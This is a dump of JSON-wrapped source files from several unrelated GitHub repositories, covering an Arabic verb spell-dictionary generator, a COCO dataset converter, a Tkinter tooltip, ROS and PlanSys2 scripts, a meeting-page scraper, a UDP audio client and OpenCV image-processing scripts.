outfile.write(json_string)\n\n return jsonify({'data': {'title':title_text, 'ingredients':ingredients, 'method':method}})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"changshuyi/tailwind_recipes","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37264622348","text":"import csvdict\nimport verbdict_functions as vdf\nimport pyarabic.araby as araby\nimport spellverbconst as svconst\nimport spellverb as vspell\nimport libqutrub.mosaref_main as msrif\nimport libqutrub.ar_verb as v_ar\nimport libqutrub.verb_valid as valid\nimport libqutrub.verb_const as const\n\nclass SpellDict(csvdict.CsvDict):\n \"\"\" a virtual converter of data from table to specific Hunspell dictionary format\n the data is big, then every function print string \"\"\"\n def __init__(self, version = \"N/A\", ):\n \"\"\"\n initiate the dict\n \"\"\"\n csvdict.CsvDict.__init__(self, version)\n def add_header(self,):\n \"\"\"\n add the header for new dict\n \"\"\"\n line = \"#\" + \"\\n##\".join(self.headerlines) +\"\\n\" \n return line\n \n def add_record(self, verb_row):\n \"\"\"\n Add a new to the dict\n \"\"\"\n self.id +=1\n v = self.treat_tuple(verb_row)\n line = \"\"\n \n \n # display fields to ensure corectness\n VERIFY_INPUT=False;\n #~ VERIFY_INPUT = True;\n if VERIFY_INPUT: \n self.test_entry(v)\n\n # conjugate the verb with speling tags\n if not valid.is_valid_infinitive_verb(v['vocalized']):\n line += u\"#\\t\\tis invalid verb\\n\",v['vocalized'].encode(\"utf8\")\n else:\n future_type = v_ar.get_future_type_entree(v['future_type']);\n conjugTable = msrif.do_sarf( v['vocalized'], v['future_type'], v['all'], v['past'],\n v['future'], v['passive'], v['imperative'],\n v['future_moode'], v['confirmed'], v['transitive'], \n \"DICT\");\n TableEntries = {}\n if conjugTable: \n TableEntries = {}\n\n for tense in conjugTable.keys():\n for pronoun in conjugTable[tense].keys():\n if pronoun != const.PronounAntuma_f: \n\n flags = svconst.TabPrefixes[tense]['full'];\n\n # the passive tenses dont take object suffix, only with double transitie verbs\n if (v['transitive'] and tense in const.TableIndicativeTense) or v['double_trans']:#:\n \n # add flags for suffixes\n if v['think_trans'] and v['reflexive_trans']: \n flags += svconst.TabSuffixesPronominale[pronoun]['full'];\n else:\n flags += svconst.TabSuffixes[pronoun]['full'];\n \n # add flag yeh for the الأفعال الخمسة \n if tense == const.TenseFuture and pronoun in (const.PronounAnti, const.PronounAntuma, const.PronounAntuma_f, \n const.PronounAntum, const.PronounHuma, const.PronounHuma_f, const.PronounHum ):\n flags+=u\"Ha\"; \n \n # add double object suffixe, if the verb is double transitive, and the tense is indicative \n if v['double_trans'] and tense in const.TableIndicativeTense:\n \n # add flags for suffixes (double object)\n flags += svconst.TabDisplayTagDouble[pronoun]['full'];\n \n #add an entree to the table entrie\n # this allows to reduce many cases into one entree\n word_nm = araby.strip_tashkeel(conjugTable[tense][pronoun]);\n if TableEntries.has_key(word_nm):\n TableEntries[word_nm] += flags;\n else:\n TableEntries[word_nm] = flags;\n #print (u'%s/%s\\t%s%s'%(ar_strip_marks(conjugTable[tense][pronoun]), flags, word,verb_cat));\n # print element from the TableEntries\n for key in TableEntries.keys():\n if key!=\"\":\n line +=u'%s/%s\\n'%(key, vspell.unify_flags(TableEntries[key])) \n \n return line\n \n \n def test_entry(self, verb_tuple):\n \"\"\"\n Verify entrie\n \"\"\" \n print(\"------------------------------\");\n print(u\"\\t\".join(['word', verb_tuple['word']]));\n print(u\"\\t\".join(['future_type', verb_tuple['future_type']]));\n print(u\"\\t\".join(['transitive',str(verb_tuple['transitive']), ]));\n print(u\"\\t\".join(['double_trans',str(verb_tuple['double_trans']), ]));\n print(u\"\\t\".join(['think_trans',str(verb_tuple['think_trans']), ]));\n print(u\"\\t\".join(['unthink_trans',str(verb_tuple['unthink_trans']), ]));\n print(u\"\\t\".join(['reflexive_trans',str(verb_tuple['reflexive_trans']), ]));\n if all:\n tenses=u\"يعملان\";\n else:\n tenses=u\"\";\n if verb_tuple['past']: tenses+=u\"ي\";\n else: tenses+=\"-\";\n if verb_tuple['future']: tenses+=u\"ع\";\n else: tenses+=\"-\";\n if verb_tuple['imperative']: tenses+=u\"م\";\n else: tenses+=\"-\";\n if verb_tuple['passive']: tenses+=u\"ل\";\n else: tenses+=u\"-\";\n if verb_tuple['future_moode']: tenses+=u\"ا\";\n else: tenses+=u\"-\";\n if verb_tuple['confirmed']: tenses+=u\"ن\";\n else: tenses+=u\"-\";\n print(u\"\\t\".join(['tense', tenses]));\n print(\"------------------------------\");\n \n def add_footer(self):\n \"\"\"close the data set, used for ending xml, or sql\"\"\"\n \n return \"\"\"\"\"\"\n","repo_name":"linuxscout/arramooz","sub_path":"scripts/verbs/spelldict.py","file_name":"spelldict.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"47"} +{"seq_id":"7945368070","text":"import datetime\nimport json\nimport os\n\nimport numpy as np\n\n# sys.path.append(\"/root/autodl-tmp/archive/metrics\")\nfrom .data_transformer import get_transformer\nfrom .pycococreatortools import create_annotation_info, create_image_info\n\n\ndef convert_to_coco(dataset_name, data_dir, save_path, test_mode=False):\n \"\"\"\n Convert experimental datasets to COCO format.\n\n Args:\n dataset_name:\n\n\n Returns:\n\n \"\"\"\n # save_path = os.path.join(save_dir, \"annotations.json\")\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n\n # Get the corresponding class for the given dataset and initialize the class with the dataset dir.\n transformer = get_transformer(dataset_name)(data_dir)\n\n CATEGORIES = transformer.category\n INFO = {\n \"description\": \"Dataset in coco format\",\n \"url\": \"https://github.com/waspinator/pycococreator\",\n \"version\": \"0.1.0\",\n \"year\": 2023,\n \"contributor\": \"weifeiouyang\",\n \"date_created\": datetime.datetime.utcnow().isoformat(\" \"),\n }\n\n LICENSES = [\n {\n \"id\": 1,\n \"name\": \"Attribution-NonCommercial-ShareAlike License\",\n \"url\": \"http://creativecommons.org/licenses/by-nc-sa/2.0/\",\n }\n ]\n\n coco_output = {\n \"info\": INFO,\n \"licenses\": LICENSES,\n \"categories\": CATEGORIES,\n \"images\": [],\n \"annotations\": [],\n }\n\n image_id = 1\n segmentation_id = 1\n\n exs = []\n # get path of imgs\n images_files = transformer.imgs\n for image_filename in images_files:\n print(image_filename)\n image = transformer.load_img(image_filename)\n image_info = create_image_info(\n image_id, os.path.basename(image_filename), image.shape[:2]\n )\n coco_output[\"images\"].append(image_info)\n\n # get ann for this img.\n # basename = pathlib.Path(image_filename).stem\n # inst = load_img(opj(INST_DIR, \"{}.npy\".format(basename)))\n # ann_path = transformer.load_ann_path(image_filename)\n try:\n ann = transformer.load_ann_for_patch(image_filename)\n except:\n ann = transformer.load_ann(image_filename)\n\n # ann = transformer.load_ann(image_filename)\n\n inst = ann[:, :, 0]\n inst_ids = np.unique(inst)[1:]\n type_mask = ann[:, :, 1]\n # type_mask = load_img(opj(TYPE_DIR, \"{}.png\".format(basename)))\n\n for inst_id in inst_ids:\n # if inst_id == 78:\n # pass\n binary_mask = np.where(inst == inst_id, 1, 0)\n try:\n # 去除0之后的那个id; 有的图片是只有0,这种图片就直接跳过?\n class_id = np.unique(np.where(inst == inst_id, type_mask, 0))\n if len(class_id) > 2:\n # raise \"you have more than one type in one instance!\"\n ex = [image_filename, inst_id, class_id]\n exs.append(ex)\n print(ex)\n # else:\n class_id = class_id[1]\n category_info = {\"id\": int(class_id), \"is_crowd\": 0}\n annotation_info = create_annotation_info(\n segmentation_id,\n image_id,\n category_info,\n binary_mask,\n binary_mask.shape,\n tolerance=2,\n )\n if annotation_info is not None:\n coco_output[\"annotations\"].append(annotation_info)\n except Exception as e:\n print(\"error\", e)\n continue\n\n segmentation_id = segmentation_id + 1\n\n image_id = image_id + 1\n\n # test mode will not save result\n if not test_mode:\n with open(save_path, \"w\") as output_json_file:\n json.dump(coco_output, output_json_file)\n","repo_name":"RessCris2/pannuke_app","sub_path":"src/data_process/convert2coco.py","file_name":"convert2coco.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37709924867","text":"import numpy as np\nimport pandas as pd\nfrom libs.figures.connectivity_spaces import clusters_as_dots\nfrom libs.tools.ppfm import get_hemisphere_subject_pp\nfrom configuration.configuration import (\n PPFM_TABLES,\n U_FIBERS_COORD,\n HEMI_INDEXES_FILT,\n SIDES,\n CLUSTERING_LABELS,\n SUBJ_LIST,\n FIG_CLUSTERS_INDIV_SPACE,\n)\n\nif __name__ == \"__main__\":\n\n ppfm = pd.read_csv(PPFM_TABLES[\"final\"])\n data = np.load(U_FIBERS_COORD[\"iso\"])\n hemispheres_index = np.load(HEMI_INDEXES_FILT)\n side_index = np.mod(hemispheres_index, 2)\n\n for j, side in enumerate(SIDES.keys()):\n labels = np.load(CLUSTERING_LABELS[side])\n data_ = data[side_index == j]\n data_ = data_[labels != -1]\n labels_ = labels[labels != -1]\n hemi_index = hemispheres_index[side_index == j]\n hemi_index = hemi_index[labels != -1]\n\n for i, subject in enumerate(SUBJ_LIST):\n index = i * len(SIDES) + j\n data_sub = data_[hemi_index == index]\n labels_sub = labels_[hemi_index == index]\n\n title = None\n subject_pp = get_hemisphere_subject_pp(ppfm, subject, side)\n path_fig = FIG_CLUSTERS_INDIV_SPACE[(subject, side)]\n\n clusters_as_dots(\n data_sub,\n labels_sub,\n path_fig=path_fig,\n ppfm=subject_pp,\n ppfm_label=\"Individual PPFM\",\n title=title\n )\n","repo_name":"alexpron/article_central_sulcus_connectivity","sub_path":"scripts/figures/clustering/group_clusters_subjects_space.py","file_name":"group_clusters_subjects_space.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"43186208037","text":"if __name__ == \"__main__\": # For stand-alone testing with parallel TkUtil\n import os\n import sys\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),\n \"..\")))\nimport tkinter as tk\nimport tkinter.ttk as ttk\nimport tkinter.font as tkfont\nimport TkUtil\n\n\nclass Tooltip:\n\n def __init__(self, master, text, delay=1200, showTime=10000,\n background=\"lightyellow\"):\n self.master = master\n self.text = text\n self.delay = delay\n self.showTime = showTime\n self.background = background\n self.timerId = None\n self.tip = None\n self.master.bind(\"\", self.enter, \"+\")\n self.master.bind(\"\", self.leave, \"+\")\n\n \n def enter(self, event=None):\n if self.timerId is None and self.tip is None:\n self.timerId = self.master.after(self.delay, self.show)\n \n\n def leave(self, event=None):\n if self.timerId is not None:\n id = self.timerId\n self.timerId = None\n self.master.after_cancel(id)\n self.hide()\n\n\n def hide(self):\n if self.tip is not None:\n tip = self.tip\n self.tip = None\n tip.destroy()\n\n\n def show(self):\n self.leave()\n self.tip = tk.Toplevel(self.master)\n self.tip.withdraw() # Don't show until we have the geometry\n self.tip.wm_overrideredirect(True) # No window decorations etc.\n if TkUtil.mac():\n self.tip.tk.call(\"::tk::unsupported::MacWindowStyle\",\n \"style\", self.tip._w, \"help\", \"none\")\n label = ttk.Label(self.tip, text=self.text, padding=1,\n background=self.background, wraplength=480,\n relief=None if TkUtil.mac() else tk.GROOVE,\n font=tkfont.nametofont(\"TkTooltipFont\"))\n label.pack()\n x, y = self.position()\n self.tip.wm_geometry(\"+{}+{}\".format(x, y))\n self.tip.deiconify()\n if self.master.winfo_viewable():\n self.tip.transient(self.master)\n self.tip.update_idletasks()\n self.timerId = self.master.after(self.showTime, self.hide)\n\n \n def position(self):\n tipx = self.tip.winfo_reqwidth()\n tipy = self.tip.winfo_reqheight()\n width = self.tip.winfo_screenwidth()\n height = self.tip.winfo_screenheight()\n y = self.master.winfo_rooty() + self.master.winfo_height()\n if y + tipy > height:\n y = self.master.winfo_rooty() - tipy\n x = self.tip.winfo_pointerx()\n if x < 0:\n x = 0\n elif x + tipx > width:\n x = width - tipx\n return x, y\n\n\nif __name__ == \"__main__\":\n if sys.stdout.isatty():\n application = tk.Tk()\n application.title(\"Tooltip\")\n box = tk.Listbox(application)\n box.insert(\"end\", \"This is a listbox\")\n box.pack(side=\"top\")\n Tooltip(box, text=\"This is a tooltip with all the options left at \"\n \" their default values, so this is what you get if you just \"\n \" give a tooltip text\")\n button = tk.Button(application, text=\"Quit\",\n command=application.quit)\n button.pack(side=\"bottom\")\n Tooltip(button, text=\"Click to Terminate\")\n application.mainloop()\n else:\n print(\"Loaded OK\")\n","repo_name":"lovexiaov/python-in-practice","sub_path":"TkUtil/Tooltip.py","file_name":"Tooltip.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"47"} +{"seq_id":"12608162895","text":"#!/usr/bin/env python2\n\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom geometry_msgs.msg import Pose\n# from nav_msgs import Odometry\n\nglobal_msg = None\npi_2 = 1.5708\n\ndef callback(msg):\n global_msg = msg \n\ndef quat2yaw(q):\n return atan(2 * (q.x * q.y + q.w * q.z)/(q.w ** 2 + q.x ** 2 - q.y ** 2 - q.z**2))\n \ndef mround():\n rospy.init_node(\"circular_motion\")\n pub = rospy.Publisher(\"/cmd_vel_mux/input/teleop\", Twist, queue_size=0)\n # sub = rospy.Subscribe(\"/odom/\", Odometry, callback)\n rate = rospy.Rate(10)\n vel = Twist()\n vel.angular.z = 1\n vel.linear.x = 0.25\n\n while not rospy.is_shutdown():\n pub.publish(vel)\n rate.sleep()\n'''\n for i in range(0,4):\n initial_position = global_msg.position\n distance = 0\n \n while not rospy.is_shutdown() and distance < 1:\n pub.publish(vel)\n dx = initial_position.x - global_msg.position.x\n dy = initial_position.y - global_msg.position.y\n distance = sqrt(dx**2 + dy**2)\n vel.linear.x = 0\n vel.angular.z = 1\n yaw = quat2yaw(global_msg.pose.pose.orientation)\n while not rospy.is_shutdown() and yaw < pi_2:\n pub.publish(vel)\n vel.linear.x = 0.5\n '''\n","repo_name":"corwinmacmillan/ME597","sub_path":"src/cmotion/src/cmotion/mround.py","file_name":"mround.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12778873132","text":"import cv2\nimport numpy as np\nfrom PIL import Image\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QFileDialog, QLabel, QPushButton\n\n# Variables globales\nruta_imagen = None\nimagen_cargada = None\n\n# Función para cargar la imagen al hacer clic en el botón \"Cargar imagen\"\ndef cargar_imagen():\n global ruta_imagen, imagen_cargada\n ruta_imagen, _ = QFileDialog.getOpenFileName(options=QFileDialog.Options()) # Ventana de diálogo para seleccionar un archivo\n imagen_cargada = QtGui.QPixmap(ruta_imagen) # Cargar la imagen seleccionada\n etiqueta_imagen.setPixmap(imagen_cargada.scaledToHeight(1080, QtCore.Qt.SmoothTransformation))\n\n# Función para descargar la imagen con el fondo removido al hacer clic en el botón \"Descargar imagen\"\ndef descargar_imagen():\n global ruta_imagen, imagen_cargada\n if ruta_imagen is None:\n return # No se ha cargado ninguna imagen previamente\n \n # Cargar la imagen utilizando OpenCV\n imagen_cv = cv2.imread(ruta_imagen)\n\n # Convertir la imagen de BGR a RGB\n imagen_rgb = cv2.cvtColor(imagen_cv, cv2.COLOR_BGR2RGB)\n\n # Redimensionar la imagen si es necesario\n max_size = (1920, 1080) # Tamaño máximo permitido (1080p)\n imagen_rgb = cv2.resize(imagen_rgb, max_size)\n\n # Crear una máscara inicial para la segmentación\n mascara = np.zeros(imagen_rgb.shape[:2], np.uint8)\n\n # Detectar contornos en la imagen\n contornos, _ = cv2.findContours(mascara, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Encontrar el contorno más grande (supuesto objeto principal)\n contorno_objeto = max(contornos, key=cv2.contourArea)\n\n # Obtener el rectángulo delimitador del contorno\n x, y, w, h = cv2.boundingRect(contorno_objeto)\n\n # Ajustar la región de interés alrededor del objeto\n rect = (x, y, x + w, y + h)\n\n # Aplicar el algoritmo GrabCut para remover el fondo\n cv2.grabCut(imagen_rgb, mascara, rect, None, None, 5, cv2.GC_INIT_WITH_RECT)\n\n # Crear una máscara binaria donde los píxeles con valores 0 y 2 son considerados fondo, y los píxeles con valores 1 y 3 son considerados primer plano\n mascara_binaria = np.where((mascara == 2) | (mascara == 0), 0, 1).astype('uint8')\n\n # Aplicar la máscara al objeto principal en la imagen original\n imagen_final = imagen_rgb * mascara_binaria[:, :, np.newaxis]\n\n # Convertir la imagen final a formato PIL y corregir el perfil de color\n imagen_final_pil = Image.fromarray(imagen_final)\n imagen_final_pil = imagen_final_pil.convert(\"RGB\")\n\n # Guardar la imagen con el fondo removido\n ruta_guardado, _ = QFileDialog.getSaveFileName(None, \"Guardar imagen\", \"\", \"JPEG Files (*.jpg);;PNG Files (*.png)\") # Ventana de diálogo para guardar la imagen\n imagen_final_pil.save(ruta_guardado)\n print(\"Imagen guardada con éxito (fondo removido)\")\n\n# Crear la aplicación y la ventana principal\napp = QtWidgets.QApplication([])\napp.setStyle('Fusion') # Establecer el estilo de la aplicación como Fusion\n\n# Crear una paleta de colores personalizada para los botones\npaleta = QtGui.QPalette()\npaleta.setColor(QtGui.QPalette.Button, QtGui.QColor(53, 53, 53))\npaleta.setColor(QtGui.QPalette.ButtonText, QtGui.QColor(255, 255, 255))\n\n# Establecer la paleta de colores personalizada para los botones\napp.setPalette(paleta)\n\n# Establecer estilos CSS para los botones y la ventana principal\nestilos = \"\"\"\n QMainWindow {\n background-color: #333;\n }\n\n QPushButton {\n background-color: #555;\n color: #FFF;\n padding: 8px 16px;\n border-radius: 4px;\n }\n\n QPushButton:hover {\n background-color: #888;\n }\n\n QLabel {\n background-color: #000;\n border: 1px solid #FFF;\n }\n\"\"\"\n\n# Crear la ventana principal\nventana = QtWidgets.QMainWindow()\nventana.setStyleSheet(estilos)\n\n# Crear el botón \"Cargar imagen\"\nboton_cargar = QPushButton(\"Cargar imagen\", ventana)\nboton_cargar.clicked.connect(cargar_imagen)\nboton_cargar.setGeometry(QtCore.QRect(10, 10, 150, 30))\n\n# Crear el botón \"Descargar imagen\"\nboton_descargar = QPushButton(\"Descargar imagen\", ventana)\nboton_descargar.clicked.connect(descargar_imagen)\nboton_descargar.setGeometry(QtCore.QRect(10, 50, 150, 30))\n\n# Crear una etiqueta para mostrar la imagen\netiqueta_imagen = QLabel(ventana)\netiqueta_imagen.setGeometry(QtCore.QRect(180, 10, 1024, 720))\n\n# Mostrar la ventana principal\nventana.show()\napp.exec()\n","repo_name":"solidsnk86/background-remover","sub_path":"bg-remover.py","file_name":"bg-remover.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"15782228401","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\n\nfrom launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument, IncludeLaunchDescription, SetEnvironmentVariable\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import LaunchConfiguration\nfrom launch_ros.actions import Node\n\n\ndef generate_launch_description():\n # Get the launch directory\n example_dir = get_package_share_directory('problem5')\n namespace = LaunchConfiguration('namespace')\n\n declare_namespace_cmd = DeclareLaunchArgument(\n 'namespace',\n default_value='',\n description='Namespace')\n\n plansys2_cmd = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(os.path.join(\n get_package_share_directory('plansys2_bringup'),\n 'launch',\n 'plansys2_bringup_launch_monolithic.py')),\n launch_arguments={\n 'model_file': example_dir + '/pddl/domain-simple.pddl',\n 'namespace': namespace\n }.items())\n\n # Specify the actions\n move_cmd = Node(\n package='problem5',\n executable='move_node',\n name='move_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n \n move_with_box_cmd = Node(\n package='problem5',\n executable='move_with_box_node',\n name='move_with_box_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n \n move_with_box2_cmd = Node(\n package='problem5',\n executable='move_with_box2_node',\n name='move_with_box2_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n move_with_box3_cmd = Node(\n package='problem5',\n executable='move_with_box3_node',\n name='move_with_box3_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n move_with_box4_cmd = Node(\n package='problem5',\n executable='move_with_box4_node',\n name='move_with_box4_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n fill_item_cmd = Node(\n package='problem5',\n executable='fill_item_node',\n name='fill_item_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n load_carrier_cmd = Node(\n package='problem5',\n executable='load_carrier_node',\n name='load_carrier_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n unloadrobot_cmd = Node(\n package='problem5',\n executable='unloadrobot_node',\n name='unloadrobot_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n empty_box_food_cmd = Node(\n package='problem5',\n executable='empty_box_food_node',\n name='empty_box_food_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n empty_box_medicine_cmd = Node(\n package='problem5',\n executable='empty_box_medicine_node',\n name='empty_box_medicine_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n \n empty_box_tool_cmd = Node(\n package='problem5',\n executable='empty_box_tool_node',\n name='empty_box_tool_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n\n\n\n\n ld = LaunchDescription()\n\n # Set environment variables\n ld.add_action(declare_namespace_cmd)\n\n # Declare the launch options\n ld.add_action(plansys2_cmd)\n\n ld.add_action(move_cmd)\n ld.add_action(move_with_box_cmd)\n ld.add_action(move_with_box2_cmd)\n ld.add_action(move_with_box3_cmd)\n ld.add_action(move_with_box4_cmd)\n ld.add_action(load_carrier_cmd)\n ld.add_action(fill_item_cmd)\n ld.add_action(unloadrobot_cmd)\n ld.add_action(empty_box_food_cmd)\n ld.add_action(empty_box_medicine_cmd)\n ld.add_action(empty_box_tool_cmd)\n\n return ld\n","repo_name":"pierlucafaccin/automated-planning-project","sub_path":"problem5/launch/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"10815756784","text":"import re\nfrom datetime import datetime\n\nfrom city_scrapers_core.constants import ADVISORY_COMMITTEE, COMMISSION, COMMITTEE\nfrom city_scrapers_core.items import Meeting\nfrom city_scrapers_core.spiders import CityScrapersSpider\n\n\nclass IlCommerceSpider(CityScrapersSpider):\n name = \"il_commerce\"\n agency = \"Illinois Commerce Commission\"\n timezone = \"America/Chicago\"\n start_urls = [\n \"https://www.icc.illinois.gov/meetings/default.aspx?dts=32&et=1&et=5&et=3\"\n ]\n\n def parse(self, response):\n \"\"\"\n `parse` should always `yield` Meeting items.\n\n Change the `_parse_title`, `_parse_start`, etc methods to fit your scraping\n needs.\n \"\"\"\n for nav_link in response.css(\".col-sm-7 a.btn\"):\n if \"?bd=\" in nav_link.attrib[\"href\"]:\n yield response.follow(\n nav_link.attrib[\"href\"], callback=self._parse_events_page\n )\n\n yield from self._parse_events_page(response)\n\n def _parse_events_page(self, response):\n for item in response.css(\".panel-body a\"):\n yield response.follow(item.attrib[\"href\"], callback=self._parse_detail)\n\n def _parse_detail(self, response):\n title = self._parse_title(response)\n meeting = Meeting(\n title=title,\n description=self._parse_description(response),\n classification=self._parse_classification(title),\n start=self._parse_start(response),\n end=None,\n all_day=False,\n time_notes=\"\",\n location=self._parse_location(response),\n links=self._parse_links(response),\n source=response.url,\n )\n\n meeting[\"status\"] = self._get_status(\n meeting, text=\" \".join(response.css(\".col-sm-12 *::text\").extract())\n )\n meeting[\"id\"] = self._get_id(meeting)\n\n yield meeting\n\n def _parse_title(self, response):\n \"\"\"Parse or generate meeting title.\"\"\"\n title_str = re.sub(\n r\"\\s+\", \" \", \" \".join(response.css(\".soi-container h2 *::text\").extract())\n ).strip()\n return re.sub(\n r\"(Illinois Commerce Commission|(?=Committee )Committee Meeting$)\",\n \"\",\n title_str,\n ).strip()\n\n def _parse_description(self, response):\n \"\"\"Parse or generate meeting description.\"\"\"\n return re.sub(\n r\"\\s+\", \" \", \" \".join(response.css(\".col-sm-12 > p *::text\").extract())\n ).strip()\n\n def _parse_classification(self, title):\n \"\"\"Parse or generate classification from allowed options.\"\"\"\n if \"advisory\" in title.lower():\n return ADVISORY_COMMITTEE\n if \"committee\" in title.lower():\n return COMMITTEE\n return COMMISSION\n\n def _parse_start(self, response):\n \"\"\"Parse start datetime as a naive datetime object.\"\"\"\n start_str = \" \".join(response.css(\"h3.mt-4 *::text\").extract())\n dt_str = re.search(\n r\"[A-Z][a-z]{2,8} \\d{1,2}, \\d{4} \\d{1,2}:\\d{2} [APM]{2}\", start_str\n ).group()\n return datetime.strptime(dt_str, \"%B %d, %Y %I:%M %p\")\n\n def _parse_location(self, response):\n \"\"\"Parse or generate location.\"\"\"\n location_block = response.css(\".row.mt-4 > .col-12\")[0]\n location_items = location_block.css(\"p *::text\").extract()\n addr_items = [\n i.strip() for i in location_items if \"Building\" not in i and i.strip()\n ]\n name_items = [\n i.strip() for i in location_items if \"Building\" in i and i.strip()\n ]\n return {\n \"address\": \" \".join(addr_items),\n \"name\": \" \".join(name_items),\n }\n\n def _parse_links(self, response):\n \"\"\"Parse or generate links.\"\"\"\n links = []\n for link in response.css(\".row.mt-4 .list-unstyled a\"):\n links.append(\n {\n \"title\": \" \".join(link.css(\"*::text\").extract()).strip(),\n \"href\": response.urljoin(link.attrib[\"href\"]),\n }\n )\n return links\n","repo_name":"City-Bureau/city-scrapers","sub_path":"city_scrapers/spiders/il_commerce.py","file_name":"il_commerce.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":309,"dataset":"github-code","pt":"47"} +{"seq_id":"19335255720","text":"import socket\nimport pyaudio\n\n# create a UDP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# set the server address and port\nserver_address = ('localhost', 10000)\n\n# create a PyAudio object\np = pyaudio.PyAudio()\n\n# set the audio format\nFORMAT = pyaudio.paInt16\n\n# set the number of channels\nCHANNELS = 1\n\n# set the sampling rate\nRATE = 44100\n\n# set the buffer size\nCHUNK = 1024\n\n# open the audio stream\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n output=True,\n frames_per_buffer=CHUNK)\n\n# send a connection message to the server\nsock.sendto(b'connect', server_address)\n\nwhile True:\n # receive data from the server\n data, server_address = sock.recvfrom(1024)\n \n if not data:\n # if no data is received, the server has disconnected\n break\n \n # play the audio data\n stream.write(data)\n \n# close the audio stream and PyAudio object\nstream.stop_stream()\nstream.close()\np.terminate()\n","repo_name":"antonjan/Qo-100_nb_transmitter","sub_path":"QO-100_txrx_UDP_v3.py","file_name":"QO-100_txrx_UDP_v3.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"4172901250","text":"import cv2\nimport numpy as np\nimport math\nimport cmath\nimport skimage\nimport time\nimport multiprocessing\nimport sys\n\nfrom collections import deque\nfrom registration import register\n\nfrom foreground_extraction import *\nfrom blob_detection import *\n\nfrom config import *\n\ndef main():\n # Create a VideoCapture object and read from input file\n # If the input is the camera, pass 0 instead of the video file name\n cap = cv2.VideoCapture(INPUT_MASK)\n fps = cap.get(cv2.CAP_PROP_FPS)\n\n cap_orig = cv2.VideoCapture(INPUT_VIDEO)\n\n # Check if camera opened successfully\n if (cap.isOpened()== False):\n print(\"Error opening video stream or file\")\n sys.exit()\n\n frame_width = int(cap.get(3))\n frame_height = int(cap.get(4))\n out = cv2.VideoWriter(OUTPUT_MASK_BLOB_DETECTION, cv2.VideoWriter_fourcc(*'mp4v'), fps, (DISPLAY_WIDTH, DISPLAY_HEIGHT))\n\n # Process original video if provided\n if (cap_orig.isOpened() and int(cap_orig.get(3) == frame_width and cap_orig.get(4) == frame_height)):\n using_orig = True\n\n\n cpus = multiprocessing.cpu_count()\n pool = multiprocessing.Pool(processes=cpus)\n\n start = time.clock()\n # Read until video is completed\n while(cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = cap.read()\n orig_ret, orig_frame = cap_orig.read()\n if ret == True:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n moving_foreground = gray\n\n moving_foreground = remove_noise(moving_foreground)\n frame_with_detected_blobs, mask_blobs, orig_frame_with_blobs = detect_blobs(moving_foreground, frame, orig_frame)\n\n # Display the resulting frame\n\n #cv2.imshow('moving_foreground', cv2.resize(moving_foreground, (DISPLAY_WIDTH, DISPLAY_HEIGHT)))\n cv2.imshow('detected_blobs', cv2.resize(frame_with_detected_blobs, (DISPLAY_WIDTH, DISPLAY_HEIGHT)))\n #display the frame that keypoints are being found from as well as keypoints detected\n cv2.imshow('detected_blobs_mask', cv2.resize(mask_blobs, (DISPLAY_WIDTH, DISPLAY_HEIGHT)))\n\n # display original frame with overlayed detected blobs\n if(using_orig and orig_frame_with_blobs is not None):\n cv2.imshow('detected_blobs_on_orig', cv2.resize(orig_frame_with_blobs, (DISPLAY_WIDTH, DISPLAY_HEIGHT)))\n\n #if not using_orig:\n # out.write(cv2.cvtColor(frame_with_detected_blobs, cv2.COLOR_GRAY2BGR))\n #else:\n # out.write(cv2.cvtColor(orig_frame_with_blobs, cv2.COLOR_GRAY2BGR))\n\n # Press Q on keyboard to exit\n if cv2.waitKey(25) & 0xFF == ord('q'):\n break\n\n # Break the loop\n else:\n break\n\n # When everything done, release the video capture object\n cap.release()\n 